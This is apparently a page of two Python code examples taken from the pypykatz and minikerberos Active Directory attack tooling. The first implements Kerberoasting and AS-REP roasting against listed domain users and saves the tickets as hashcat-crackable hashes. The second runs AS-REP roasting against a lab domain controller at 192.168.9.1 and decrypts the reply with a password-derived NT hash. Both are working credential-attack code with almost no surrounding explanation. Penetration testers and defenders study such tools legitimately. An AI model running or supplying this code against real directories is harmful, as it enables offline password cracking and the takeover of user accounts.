コード例 #1
0
    def run_live(self, args):
        from winsspi.sspi import KerberoastSSPI
        from minikerberos.security import TGSTicket2hashcat, APREPRoast
        from minikerberos.utils import TGTTicket2hashcat
        from minikerberos.communication import KerberosSocket
        from minikerberos.common import KerberosTarget
        from pypykatz.commons.winapi.machine import LiveMachine

        if not args.target_file and not args.target_user:
            raise Exception(
                'No targets loaded! Either -u or -t MUST be specified!')

        machine = LiveMachine()

        realm = args.realm
        if not args.realm:
            realm = machine.get_domain()

        if args.cmd in ['spnroast', 'asreproast']:
            targets = []
            if args.target_file:
                with open(args.target_file, 'r') as f:
                    for line in f:
                        line = line.strip()
                        domain = None
                        username = None
                        if line.find('/') != -1:
                            #we take for granted that usernames do not have the char / in them!
                            domain, username = line.split('/')
                        else:
                            username = line

                        if args.realm:
                            domain = args.realm
                        else:
                            if domain is None:
                                raise Exception(
                                    'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
                                )

                        target = KerberosTarget()
                        target.username = username
                        target.domain = domain
                        targets.append(target)

            if args.target_user:
                for user in args.target_user:
                    domain = None
                    username = None
                    if user.find('/') != -1:
                        #we take for granted that usernames do not have the char / in them!
                        domain, username = user.split('/')
                    else:
                        username = user

                    if args.realm:
                        domain = args.realm
                    else:
                        if domain is None:
                            raise Exception(
                                'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
                            )
                    target = KerberosTarget()
                    target.username = username
                    target.domain = domain
                    targets.append(target)

            results = []
            errors = []
            if args.cmd == 'spnroast':
                for spn_name in targets:
                    ksspi = KerberoastSSPI()
                    try:
                        ticket = ksspi.get_ticket_for_spn(
                            spn_name.get_formatted_pname())
                    except Exception as e:
                        errors.append((spn_name, e))
                        continue
                    results.append(TGSTicket2hashcat(ticket))

            elif args.cmd == 'asreproast':
                dcip = args.dc_ip
                if args.dc_ip is None:
                    dcip = machine.get_domain()
                ks = KerberosSocket(dcip)
                ar = APREPRoast(ks)
                results = ar.run(targets)

            if args.out_file:
                with open(args.out_file, 'w') as f:
                    for thash in results:
                        f.write(thash + '\r\n')

            else:
                for thash in results:
                    print(thash)

            for err in errors:
                print('Failed to get ticket for %s. Reason: %s' %
                      (err[0], err[1]))

            logging.info('SSPI based Kerberoast complete')
コード例 #2
0
import hashlib

ccred = KerberosCredential()
ccred.username = '******'
ccred.domain = 'TEST.corp'

ccred2 = KerberosCredential()
ccred2.username = '******'
ccred2.domain = 'TEST.corp'

creds = [ccred, ccred2]

ks = KerberosSocket('192.168.9.1')

ar = APREPRoast(ks)
res = ar.run(creds)

rep = res[0]
print(res)

x, a, enctype, checksum, data = rep.split('$')

password = '******'
cipher = _enctype_table[int(enctype)]
key = Key(int(enctype),
          hashlib.new('md4', password.encode('utf-16-le')).digest())
cipherText = bytes.fromhex(checksum + data)
temp = cipher.decrypt(key, 3, cipherText)
print()
print()
print(temp.hex())